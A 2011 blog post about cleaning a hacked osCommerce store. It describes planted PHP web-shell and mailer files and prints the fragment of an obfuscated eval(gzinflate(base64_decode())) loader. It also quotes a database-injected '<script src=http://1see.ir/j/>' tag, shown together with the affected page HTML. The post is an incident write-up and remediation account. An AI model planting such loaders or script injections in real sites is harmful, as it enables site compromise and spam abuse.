script src=http://1see.ir/j/
Long time no write – but here’s another exploit. – maybe two.
My clients’ hosting company contacted him regarding spam mail being sent from his account. After downloading his site I found a couple of exploits that had been popped in there:
In the catalog/images folder there were three extra files *.php, *.phtml and *.ind – each of those contained the same code that terminated in a php mail() function, if accessed they will give you ‘console’ window (see images at foot of post) from which you can rename, delete, upload and change file permissions.
Opening this on my localhost allowed me several minutes of fun as I scampered around the hard drive right into the root folder – not sure how far you’d really get on a live, web facing server – on the one I Googled up the console was limited to just the images folder – but there’s quite a few sites seem to have this file out there.
OK – so that’s all very well, what about the mail() function? Find a web facing server that has the files on it and you’ll get a login screen – I guess Mr Hacker logs in, uploads a file plus a list of email addresses and spamsalot.
As if that’s not enough in the catalog/images folder there were also a lot of ‘hidden’ files starting with a full stop:
A quick look inside reveals our old friend – (base64_decode())
<? eval(gzinflate(base64_decode('
7Rxrd9rG8rN7Tv/DWpdTQ0uwANuJH7jBxA/s2I7B......
No idea what they were up to – rather than decode then lot I just binned them then popped an htaccess file into the images folder to stop scripts running from within the folder.
Great, so that’s us cured? What about the title of the post? Whats the script src=http://1see.ir/j/
all about then? The left hand menu on the /catalog/ pages had an attempt at injecting a script in there – the HTML looked like (lots of nested tables – yaaay!)
<table cellpadding="0" cellspacing="0" border="0" class="bg1"> <tr> <td class="bg2"> <table cellpadding="0" cellspacing="0" border="0" class="bg3"> <tr> <td class="set"><a href=http://www.adomain.com/script-srchttp1seeirj-c-92.html><script src=http://1see.ir/j/> </a></td> </tr> </table> </td> </tr> </table><br style="line-height:1px"> <table cellpadding="0" cellspacing="0" border="0" class="bg1"> <tr> <td class="bg2"> <table cellpadding="0" cellspacing="0" border="0" class="bg3"> <tr> <td class="set"><a href=http://www.adomain.com/script-c-93.html></script> </a></td> </tr> </table>
OK – so what’s with the javascript and how does it get there? The database has been hacked with an attempt to pop a javascript in there instead of a category name – glance in the database shows that the categories_name field in the categories table for one category had the <script src=http://1see.ir/j/> bit and the next category had the </script>.
Snippety snip, deleted and correct category names added.
Not sure if the javascript is linked to the files in the images folder or not.
-
- Hidden files in the images folder
-
- Web facing mailer login
-
- File manipulation console
| Print article | This entry was posted by Graeme on July 29, 2011 at 10:38 am, and is filed under Security, osCommerce. Follow any responses to this post through RSS 2.0. You can leave a response or trackback from your own site. |